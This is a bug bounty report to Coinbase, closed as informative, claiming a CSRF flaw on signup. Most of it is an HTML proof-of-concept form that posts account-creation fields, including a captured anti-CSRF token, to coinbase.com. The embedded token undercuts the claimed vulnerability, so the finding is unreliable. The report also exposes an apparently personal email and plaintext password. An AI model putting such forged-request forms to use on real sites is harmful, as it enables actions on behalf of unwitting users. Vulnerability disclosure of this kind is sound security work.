Csrf bug on signup session
C
Coinbase
Submitted None
Actions:
Reported by
dark_heaven
Vulnerability Details
Technical details and impact analysis
> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, researchers are more likely to earn a larger bounty by explaining how a vulnerability can be exploited to cause harm to Coinbase or its users.
**Summary:** [CSRF bug on coinbase]
**Description:** [Sir In signup session I intercept using burpsuite professional. Then i make CSRF POC I I test this on by browser. I change data to check actually it's working or not. It's actually send request to my mail for verify email address. CSRF POC is below:-
-----------------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<form action="https://www.coinbase.com/users" method="POST">
<input type="hidden" name="utf8" value="✓" />
<input type="hidden" name="authenticity_token" value="nCesx4OwNXcQRUR/0YIGDaBMFThkj3FbZjHOeV2ANvRXTBjnUjDb30otf7hsjKO/vItsb0MupYvyRr1fIs77Ow==" />
<input type="hidden" name="user[first_name]" value="anirban" />
<input type="hidden" name="user[last_name]" value="singha" />
<input type="hidden" name="user[email]" value="anirbansingha1@gmail.com" />
<input type="hidden" name="user[password]" value="dadaboji" />
<input type="hidden" name="g-recaptcha-response" value="03AIezHSYALkPQNKFq_8LadLUQyLi0eBef4aNZ2UCyfLtGE95EW77m-uAvI25VAVb839olRqXfMsqjAEn5eANLARw4sw6vKlJ-u0qDQ1j_aqZ_RnDi38AokPkKhypKvoY1P7T7TMZkVzfBgsXPXC0-LXSXQW6UyfvZ_W8LSo1YfgrAtD5EZI5TtG5Qao47ylsASetNKhtS7OloBmliEVFS46n6jHcGT8zPN1XI4y8vkXto5pueuQQ3ZDFM3kX24GLEvge_ZJ2RGIyxRkqDDgQ1buPjQLsCtoHwF8twDDGV0qETHUh6npihSfRMyPJxRsZAhfBW0MfKHcxAF0LkmaTOP0k11xpfxZIsyUW4sx190TR-mcHfFfzxXkCG32DmYha1rR6JyFLeyusiX8S2AHCEalVeWIKuE-XdQE0vIskTChcF0K6XPJPX2sU" />
<input type="hidden" name="user[accepted_user_agreement]" value="0" />
<input type="hidden" name="user[accepted_user_agreement]" value="1" />
<input type="hidden" name="commit" value="Create account" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------------------------------------------
]
## Browsers Verified In:
* [firefox 45.9.0]
* [add each browser and version number tested in]
## Steps To Reproduce:
(Add details for how we can reproduce the issue)
1. [intercept a request using burpsuite after pressing signup button]
1. [make a CSRF prove of concept using burpsuite]
1. [Change data and test in browser. It will work compleately fine]
## Supporting Material/References:
* List any additional material (e.g. screenshots, logs, etc.)
Report Details
Additional information and metadata
State
Closed
Substate
Informative
Submitted
Weakness
Cross-Site Request Forgery (CSRF)